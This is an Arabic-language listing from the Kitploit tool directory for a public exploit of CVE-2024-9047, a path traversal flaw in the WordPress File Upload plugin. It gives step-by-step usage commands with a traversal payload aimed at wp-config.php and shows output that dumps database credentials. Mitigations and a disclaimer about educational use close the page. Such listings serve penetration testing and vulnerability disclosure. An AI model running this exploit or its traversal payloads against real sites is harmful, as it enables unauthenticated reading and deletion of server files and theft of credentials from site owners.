Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9047-Exploit — استغلال لـ WordPress File Upload Plugin - جميع الإصدارات حتى 4.24.11 معرضة للخطر. | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-9047-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

استغلال لـ WordPress File Upload Plugin - جميع الإصدارات حتى 4.24.11 معرضة للخطر.

عرض المستودع
41منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9047: استغلال ثغرة في إضافة رفع الملفات لووردبريس

الوصف

إن إضافة WordPress File Upload لووردبريس معرضة لثغرة من نوع اجتياز المسار (Path Traversal) في جميع الإصدارات حتى 4.24.11 وذلك عبر ملف wfu_file_downloader.php. تسمح هذه الثغرة للمهاجمين غير المصادقين بقراءة أو حذف ملفات خارج الدليل المقصود. يتطلب الاستغلال الناجح أن يكون تثبيت ووردبريس المستهدف يعمل على إصدار PHP 7.4 أو أقدم.

التأثير

  • الخطورة: حرجة
  • درجة CVSS: 9.8 (حرجة)
  • ناقل الهجوم: الشبكة
  • المصادقة المطلوبة: لا

الاستغلال

يمكن للمهاجم استغلال هذه الثغرة عن طريق صياغة طلب معين إلى نقطة النهاية الضعيفة wfu_file_downloader.php، والتلاعب بمعامل مسار الملف للحصول على وصول غير مصرح به إلى ملفات حساسة على الخادم.


تفاصيل الاستغلال

المتطلبات

  • يجب أن يحتوي تثبيت ووردبريس المستهدف على الإضافة الضعيفة (الإصدار 4.24.11 أو أقدم).
  • يجب أن يعمل الخادم على إصدار PHP 7.4 أو أقدم.

خطوات الاستغلال

  1. استنساخ هذا المستودع:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. تثبيت تبعيات بايثون (إذا لزم الأمر):

    root@kitploit:~
    pip install requests
    
  3. تشغيل البرنامج النصي للتحقق من إصدار الإضافة واستغلال الثغرة:

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

مثال على الاستخدام

لاستغلال التهيئة الضعيفة الافتراضية وقراءة ملف تهيئة ووردبريس:

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

النتيجة

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


التخفيف

لحماية موقع ووردبريس الخاص بك:

  1. تحديث إضافة WordPress File Upload إلى أحدث إصدار.
  2. التأكد من تحديث إصدار PHP إلى إصدار مدعوم (أعلى من 7.4).
  3. تقييد صلاحيات الملفات لمنع الوصول غير المصرح به إلى الملفات الحساسة.
  4. استخدام جدار حماية تطبيقات الويب (WAF) لحظر الطلبات الخبيثة.

إخلاء مسؤولية

هذا الكود مخصص للأغراض التعليمية والبحثية فقط. الاستخدام غير المصرح به لهذا البرنامج النصي على أنظمة لا تمتلكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي. لا يتحمل المؤلفون أي مسؤولية عن أي إساءة استخدام لهذا الكود.

تنزيل الأداة